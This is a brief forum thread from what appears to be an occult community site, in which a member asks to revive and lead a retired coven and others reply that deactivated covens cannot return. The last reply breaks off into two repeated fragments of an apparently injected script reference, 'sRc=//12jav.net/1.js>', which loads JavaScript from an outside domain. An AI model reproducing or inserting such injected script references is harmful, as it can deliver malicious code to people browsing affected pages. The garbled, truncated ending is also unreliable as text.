Reactivating a coven

Hello.I am Squall.I have been a member of this website for a while.I have been learning, reading, trying many things in this website.While on it I saw some covens which had been retired.

Is it possible to run that coven again?

If so then, can I gain the honour to lead that coven? The coven that i am interested in is called 'the dark moons light'.

If the coven has been deactivated it means it no longer can be/will be brought back to be run again, so the answer is likely a no.

Petrarca deleted majority of older covens and or retired them so the covens that are currently are on this site are the only covens sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
